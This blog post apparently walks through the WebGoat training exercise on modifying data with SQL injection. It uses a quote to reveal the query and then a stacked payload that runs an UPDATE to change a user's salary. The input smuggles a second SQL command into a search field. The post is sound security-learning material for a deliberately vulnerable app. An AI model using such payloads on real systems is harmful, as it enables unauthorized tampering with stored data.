Pages

Monday, August 22, 2011

WebGoat - Modify Data with SQL Injection

Requirement:



Solution:

As we can see from above picture, here is SQL searching based on user's input and there are two columns(USERID and SALARY) in the table.
In order to check if there is SQL Injection vulnerability, we input single quote and then we got the following ERROR information (replied from server):



Now we got the SQL statement structure:

SELECT * FROM salaries WHERE userid = '''

Here, "salaries" is the TABLE name. Now we can conduct the malicious input:

jsmith'; UPDATE salaries SET SALARY=5000 WHERE userid='jsmith

So the user's input will inject another SQL statement. The two SQL are:

SELECT * FROM salaries WHERE userid = 'jsmith'; UPDATE salaries SET SALARY=5000 WHERE userid='jsmith'

Submit and then jsmith's salary has been changed to 5000.

Reference:
[1] http://www.w3schools.com/sql/sql_update.asp

3 comments: